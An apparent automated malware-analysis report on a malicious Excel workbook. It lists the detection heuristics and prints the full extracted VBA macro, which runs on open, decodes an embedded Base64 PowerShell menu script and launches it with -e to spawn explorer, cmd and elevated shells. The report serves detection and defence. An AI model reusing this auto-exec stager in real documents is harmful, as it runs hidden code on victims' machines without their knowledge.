Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 a78c1d1ec24d6dc4…

MALICIOUS

Office (OLE) / .XLS

55.0 KB Created: 2022-12-29 03:58:56 Authoring application: Microsoft Excel First seen: 2026-06-23
MD5: cccb8fde235f6313e4a77b65e59a5815 SHA-1: 7e111d28ad791e86a1c800ec248e8df04b7cb58e SHA-256: a78c1d1ec24d6dc472ef2b60744b18acffd538f2661a3c600b66bf7c1857310d
428 Risk Score

Heuristics 10

  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim shell As Object
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set shell = CreateObject("Wscript.shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            pspath = shell.ExpandEnvironmentStrings("%windir%") & "\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
        Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6296 bytes
SHA-256: 2620ae659a2b6f804d51030cbe3839dca234c9efd80321c93901e5cb645b2604
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Window-style values for the second argument of WScript.Shell.Run, defined
' locally instead of relying on the VBA enum of the same names.
' Only vbNormalFocus is referenced in the visible source (Workbook_Open), so
' the launched PowerShell window is not hidden; vbHide is declared but unused here.
Private Const vbHide = 0
Private Const vbNormalFocus = 1


' Returns True when WMI reports a 64-bit operating system.
' Queries Win32_OperatingSystem through a late-bound WbemScripting.SWbemLocator
' and looks for "64" in OSArchitecture. Workbook_Open uses the result to pick
' which PowerShell host path to launch.
Private Function Isx64() As Boolean
    Dim cols As Object
    Dim col As Object
    Dim ret As Boolean
  
    ret = False
    ' WMI query via CreateObject; this is the line the OLE_VBA_CREATEOBJ heuristic matched.
    Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem")
    For Each col In cols
        ' Substring match on the OSArchitecture string; stops at the first matching row.
        If InStr(col.OSArchitecture, "64") Then
            ret = True
            Exit For
        End If
    Next
    Isx64 = ret
End Function

' Base64-encodes a VBA String using an MSXML element with DataType "bin.base64".
' The String -> Byte() assignment copies the string's internal UTF-16LE bytes,
' so the output is the UTF-16LE Base64 form that "powershell -e" (EncodedCommand)
' expects. Any line feeds MSXML inserts into the encoded text are stripped.
' Returns the Base64 text; no error handling.
Private Function EncodeScript(ByRef text As String) As String
    Dim bin() As Byte
    Dim node As Object
    Set node = CreateObject("Msxml2.DOMDocument.3.0").createElement("base64")
    ' String to Byte() assignment: yields the UTF-16LE representation of text.
    bin = text

    node.DataType = "bin.base64"
    node.nodeTypedValue = bin

    ' node.text holds the Base64; remove LF separators so it is one line.
    EncodeScript = Replace(node.text, vbLf, "")
    Set node = Nothing
End Function

' Decodes a Base64 string to text.
' MSXML converts the Base64 into a byte array (nodeTypedValue); an ADODB.Stream
' then takes those bytes in binary mode and re-reads them as UTF-8 text.
' In this module it is applied to LocalScript(), whose payload is stored as
' UTF-8 Base64, before EncodeScript re-encodes the text as UTF-16LE Base64.
' Returns the decoded text; no error handling.
Private Function DecodeBase64(ByRef base64 As String) As String
    Dim node As Object
    Dim adost As Object
    Set node = CreateObject("Msxml2.DOMDocument.3.0").createElement("base64")
    
    node.DataType = "bin.base64"
    node.text = base64

    ' ADODB.Stream is the second COM object used here (an OLE_VBA_PCODE_AUTOEXEC_EXEC token).
    Set adost = CreateObject("ADODB.Stream")
    adost.Type = 1 ' adTypeBinary
    adost.Open
    adost.Write node.nodeTypedValue
    adost.Position = 0
    ' Switch the same stream to text mode and read the bytes back as UTF-8.
    adost.Type = 2 ' adTypeText
    adost.Charset = "utf-8"
    DecodeBase64 = adost.ReadText

    Set adost = Nothing
    Set node = Nothing
End Function

' Returns the embedded payload as a single Base64 string, assembled by
' concatenating many short literals (which also keeps the blob out of any
' one-line string match).
' Reviewer decode of the Base64 (UTF-8 text): a PowerShell class named "Menu"
' that prints a "Corvette" banner and a numbered menu; the items start
' explorer.exe, cmd.exe or powershell.exe in the temp directory, several with
' -Verb RunAs (elevation prompt), and item 0 re-launches the script itself
' elevated via "-e". Confirm against the extracted artifact before relying on this.
Private Function LocalScript() As String
    Dim s As String

    s = "Y2xhc3MgTWVudSB7CiAgICBbc3RyaW5nXSRob21lX2RpcgogICAgW3N0cmluZ10kbXlfc2Ny"
    s = s + "aXB0CgogICAgTWVudShbTWFuYWdlbWVudC5BdXRvbWF0aW9uLkludm9jYXRpb25JbmZvXSRp"
    s = s + "bmZvKSB7CiAgICAgICAgJHRoaXMuaG9tZV9kaXIgPSBbSU8uUGF0aF06OkdldFRlbXBQYXRo"
    s = s + "KCkKICAgICAgICBpZiAoW3N0cmluZ106OklzTnVsbE9yRW1wdHkoJGluZm8uTXlDb21tYW5k"
    s = s + "LlBhdGgpKSB7CiAgICAgICAgICAgICR0aGlzLm15X3NjcmlwdCA9ICRpbmZvLk15Q29tbWFu"
    s = s + "ZAogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICR0aGlzLm15X3NjcmlwdCA9IFtJTy5G"
    s = s + "aWxlXTo6UmVhZEFsbFRleHQoJGluZm8uTXlDb21tYW5kLlBhdGgpCiAgICAgICAgfQogICAg"
    s = s + "fQoKICAgIGhpZGRlbiBbYm9vbF1MYXVuY2hDb21tYW5kKCRjbWQpIHsKICAgICAgICBzd2l0"
    s = s + "Y2ggKCRjbWQpIHsKICAgICAgICAgICAgIjAiIHsKICAgICAgICAgICAgICAgICRzY3JpcHRf"
    s = s + "YjY0ID0gW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVuaWNv"
    s = s + "ZGUuR2V0Qnl0ZXMoJHRoaXMubXlfc2NyaXB0KSkKICAgICAgICAgICAgICAgIFN0YXJ0LVBy"
    s = s + "b2Nlc3MgLUZpbGVQYXRoICJwb3dlcnNoZWxsLmV4ZSIgLXZlcmIgcnVuYXMgLUFyZ3VtZW50"
    s = s + "TGlzdCBAKCItZSIsICRzY3JpcHRfYjY0KQogICAgICAgICAgICB9CiAgICAgICAgICAgICIx"
    s = s + "IiB7CiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiZXhwbG9yZXIu"
    s = s + "ZXhlIiAtQXJndW1lbnRMaXN0IEAoJHRoaXMuaG9tZV9kaXIpCiAgICAgICAgICAgIH0KICAg"
    s = s + "ICAgICAgICAgIjIiIHsKICAgICAgICAgICAgICAgIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRo"
    s = s + "ICJjbWQuZXhlIiAtV29ya2luZ0RpcmVjdG9yeSAkdGhpcy5ob21lX2RpcgogICAgICAgICAg"
    s = s + "ICB9CiAgICAgICAgICAgICIzIiB7CiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1G"
    s = s + "aWxlUGF0aCAicG93ZXJzaGVsbC5leGUiIC1Xb3JraW5nRGlyZWN0b3J5ICR0aGlzLmhvbWVf"
    s = s + "ZGlyCiAgICAgICAgICAgIH0KICAgICAgICAgICAgIjQiIHsKICAgICAgICAgICAgICAgICRh"
    s = s + "cmdzID0gQCgiL2sgY2QgL2QgYCIkKCR0aGlzLmhvbWVfZGlyKWAiIikKICAgICAgICAgICAg"
    s = s + "ICAgIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJjbWQuZXhlIiAtdmVyYiBydW5hcyAtQXJn"
    s = s + "dW1lbnRMaXN0ICRhcmdzCiAgICAgICAgICAgIH0KICAgICAgICAgICAgIjUiIHsKICAgICAg"
    s = s + "ICAgICAgICAgICRhcmdzID0gQCgiLU5vRXhpdCIsICItQ29tbWFuZCIsICJjZCBgIiIgKyAk"
    s = s + "dGhpcy5ob21lX2RpciArICJgIiIpCiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1G"
    s = s + "aWxlUGF0aCAicG93ZXJzaGVsbC5leGUiIC12ZXJiIHJ1bmFzIC1Bcmd1bWVudExpc3QgJGFy"
    s = s + "Z3MKICAgICAgICAgICAgfQogICAgICAgICAgICBkZWZhdWx0IHsKICAgICAgICAgICAgICAg"
    s = s + "IHJldHVybiAkZmFsc2UKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm4g"
    s = s + "JHRydWUKICAgIH0KCiAgICBbdm9pZF1PcGVuTWVudSgpIHsKICAgICAgICBXcml0ZS1Ib3N0"
    s = s + "ICJDb3J2ZXR0ZSIKICAgICAgICB3aGlsZSAoJHRydWUpIHsKICAgICAgICAgICAgV3JpdGUt"
    s = s + "SG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIgogICAgICAgICAg"
    s = s + "ICBXcml0ZS1Ib3N0ICIgMCkgUnVuIGFzIGFkbWluaXN0cmF0b3IiCiAgICAgICAgICAgIFdy"
    s = s + "aXRlLUhvc3QgIiAxKSBPcGVuIGFuIGV4cGxvcmVyIgogICAgICAgICAgICBXcml0ZS1Ib3N0"
    s = s + "ICIgMikgQ3JlYXRlIGEgbmV3IGNvbW1hbmQgc2hlbGwiCiAgICAgICAgICAgIFdyaXRlLUhv"
    s = s + "c3QgIiAzKSBDcmVhdGUgYSBuZXcgcG93ZXJzaGVsbCIKICAgICAgICAgICAgV3JpdGUtSG9z"
    s = s + "dCAiIDQpIENyZWF0ZSBhIG5ldyBjb21tYW5kIHNoZWxsIChSdW4gYXMgYWRtaW5pc3RyYXRv"
    s = s + "cikiCiAgICAgICAgICAgIFdyaXRlLUhvc3QgIiA1KSBDcmVhdGUgYSBuZXcgcG93ZXJzaGVs"
    s = s + "bCAoUnVuIGFzIGFkbWluaXN0cmF0b3IpIgoKICAgICAgICAgICAgd2hpbGUgKCEkdGhpcy5M"
    s = s + "YXVuY2hDb21tYW5kKChSZWFkLUhvc3QgIlBsZWFzZSBjaG9vc2UgYSBtZW51IGl0ZW0gdG8g"
    s = s + "cnVuIikpKSB7fQogICAgICAgIH0KICAgIH0KfQpbTWVudV06Ok5ldygkTXlJbnZvY2F0aW9u"
    s = s + "KS5PcGVuTWVudSgpCg=="

    LocalScript = s
End Function


' Auto-exec entry point: runs when the workbook is opened with macros enabled.
' Resolves the path to powershell.exe, converts the embedded payload into the
' UTF-16LE Base64 form that "-e" expects, and starts it via WScript.Shell.Run.
' Detection note: the observable is Excel spawning
' <windir>\...\WindowsPowerShell\v1.0\powershell.exe with "-e" and a long
' Base64 argument, in a visible window (vbNormalFocus = 1 in this module).
Private Sub Workbook_Open()
    Dim shell As Object   ' variable named "shell" (this declaration is what OLE_VBA_SHELL matched); the launch is shell.Run below
    Dim script As String
    Dim pspath As String
    
    Set shell = CreateObject("Wscript.shell")
    ' On a 64-bit OS the SysWOW64 (32-bit) PowerShell host is chosen, otherwise the System32 one.
    If Isx64() Then
        pspath = shell.ExpandEnvironmentStrings("%windir%") & "\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Else
        pspath = shell.ExpandEnvironmentStrings("%windir%") & "\System32\WindowsPowerShell\v1.0\powershell.exe"
    End If

    ' Stored UTF-8 Base64 -> decoded text -> re-encoded as UTF-16LE Base64 for -e.
    script = EncodeScript(DecodeBase64(LocalScript()))

    Dim ret As Integer
    ' vbNormalFocus (1) = visible window; False = do not wait for the process. ret is never inspected.
    ret = shell.Run(pspath & " -e " & script, vbNormalFocus, False)

End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True